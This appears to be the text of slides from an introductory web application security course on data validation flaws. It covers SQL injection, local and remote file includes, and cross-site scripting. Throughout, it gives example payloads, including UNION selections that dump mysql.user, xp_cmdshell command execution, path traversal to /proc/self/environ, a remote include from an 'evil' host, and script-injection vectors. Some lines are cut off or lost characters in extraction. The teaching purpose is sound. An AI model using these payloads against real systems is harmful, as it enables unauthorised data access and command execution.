In part 14 of Web Application Security 101 you will learn about SQL Injection, Cross-site Scripting, Local File Includes and other common types of data validation problems.

1. Data Validation
Common input validation problems.

2. Types Of Problems
SQL Injection
Local File Includes
Cross-site Scripting

3. SQL Injection
SQL Injection is an attack where a partial or a complete SQL query is
inserted/injected into another query run by the targeted application.

4. Types Of SQL Injection
Vanilla - when errors are displayed.
Blind - when no errors are displayed.

5. SQL Backends
There are multiple SQL backends that have various features.
Common Backends
MsSQL (Transact-SQL)
MySQL
PostgreSQL
Oracle (PL/SQL)
Many More

6. SQL Injection In Principle
Works by injecting SQL parts in already existing queries.
SELECT * FROM table WHERE column = 'injected by the user'

7. In Detail
Assuming that $valueis a variable controlled by the user:
$query = "SELECT * FROM table WHERE column = '" + $value + "'";
When $valueequals to ' OR '1'='1then:
SELECT * FROM table WHERE column = '' OR '1'='1'

8. SQL Injection Techniques
Union Selection - to obtain values from other tables.
SELECT * FROM table WHERE column = '' UNION SELECT 'a','b','c','d','e'
Boolean Selection - to create universally true or false statements.
SELECT * FROM table WHERE column = '' OR '1'='1'
Time Selection - to measure injection by timing the execution.
SELECT * FROM table WHERE column = '' OR IF(1=1, sleep(10), 'false'))--'

9. MsSQL Injection Techniques
Table enumeration - find the table structure.
SELECT * FROM table WHERE column = '' HAVING 1=1--'
SELECT * FROM table WHERE column = '' GROUP BY column1,columnN HAVING 1=1--
Code execution - running arbitrary commands.
SELECT * FROM table WHERE column = ''; exec master.dbo.xp_cmdshell 'comman
Query delay - timing delay after query.
SELECT * FROM table WHERE column = ''; WAITFOR DELAY '0:0:30'

10. MySQL Injection Techniques Pt. 1
Finding information - retrieving various server variables and functions.
SELECT * FROM table WHERE column = '' AND 1=0 UNION SELECT @@version, 'b',
User enumeration - retrieving MySQL server users and passwords.
SELECT * FROM table WHERE column = '' UNION SELECT * FROM mysql.user#'

11. MySQL Injection Techniques Pt. 2
Table enumeration - retrieving MySQL server tables.
SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.tables#
Column enumeration - retrieving MySQL server columns.
SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.columns

12. SQL Injection Tools
Sqlninja
Sqlmap

13. SQL Injection Is Art
There are many different types of tools and techniques with various
level of complexity used to exploit SQL Injection vulnerabilities.

14. File Includes
This attack vector is used to perform arbitrary file/url read or
execution using low-level functions and application-specific features.

15. Types Of File Includes
Local File Include - when the included file is local.
Remote File Include - when the included file is fetched remotely.

16. File Include In Principle
Works when user data reaches a function used to fetch a file.
<?php fetchfile("./path/to/file/injected by the user") ?>

17. In Detail
Assuming that $valueis a variable controlled by the user:
<?php fetchfile("./path/to/file/" . $value) ?>
When $valueequals to ../../../index.phpthen:
<?php fetchfile("./path/to/file/../../../index.php") ?>

18. File Include Techniques Pt. 1
Usage of ../to traverse directory structure.
<?php fetchfile("./path/to/file/../../../index.php") ?>
Usage of null (0x00) to terminate strings for low level C functions.
<?php fetchfile("./path/to/file/../../../index.php0.txt") ?>

19. File Include Techniques Pt. 2
Usage of overlong dot (0xc0, 0xae) to by pass escape functions.
<?php fetchfile("./path/to/file/xc0xae./../../index.php0.txt") ?>
Usage of system resources to cause other behaviour.
<?php fetchfile("./path/to/file/../../../../../proc/self/environ") ?>

20. Remote File Includes
This type of problem occurs when injecting a remote file controlled
by the attacker. In this case, the attacker has a greater control over
the exploitation process if something special is done to the file.
<?php fetchfile("http://evil/path/to/file") ?>

21. FI Is Art
File Include attacks are a popular mechanism for compromising web
applications.

22. Cross-site Scripting
Is a type of vulnerability where an attacker can bypass SOP (Same
Origin Policy) through client-side injection or by abusing forms of
configuration.

23. Types Of XSS
Reflected - when the injection is immediately returned.
Stored - when the injection is stored.
DOM-based - when the injection occurs due to JS.
Others - the are many other uncategorized varients.

24. XSS In Principle
Works by injecting fragments of HTML/JS inside the web page.
<span>injected by the user</span>

25. In Detail
Assuming that $valueis a variable controlled by the user:
<?php ?><span><?php echo $value ?></span>
When $valueequals to <script>alert(1)</script>then:
<span><script>alert(1)</script></span>

26. XSS Techniques Pt. 1
When script tags are sanitized or escaped.
<span><img src=a onerror=alert(1)></span>
When the injection occurs inside an event attribute.
<button onclick="alert(1)"></button>

27. XSS Techniques Pt. 2
When the injection occurs inside JavaScript a tag.
<script>var a = ""; alert(1); "";</script>
When the injection occurs in multiple small places.
<span><script>alert(1)/* is something like */</script></span>

28. Stored XSS
The injection is temporarily or permanently stored.
<?php $_SESSION['name'] = $_GET['name'] ?>
Later on there is this code that causes for the XSS to occur:
<?php ?><span><?php echo $_SESSION['name'] ?></span>

29. DOM-based XSS
The injection may occur at any point but triggered via JavaScript.
<script>
var match = document.location.search.match(/[?&]name=(w+)/);
if (match) {
document.write("Hello " + match[1]);
}
</script>
There are many different ways an injection can occur.

30. Other Forms Of XSS
The presence of crossdomain.xmlmay open the app to XSS.
<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

31. XSS Is Art
Cross-site scripting is very popular and widely spread vulnerability.

32. Other Input Validations Flaws
Memory Corruption
Command Injection
LDAP Injection
XML Injection
XPATH Injection
SSI Injection
Remote File Inclusion
Many, Many More

33. Lab
We will be finding data validation problems.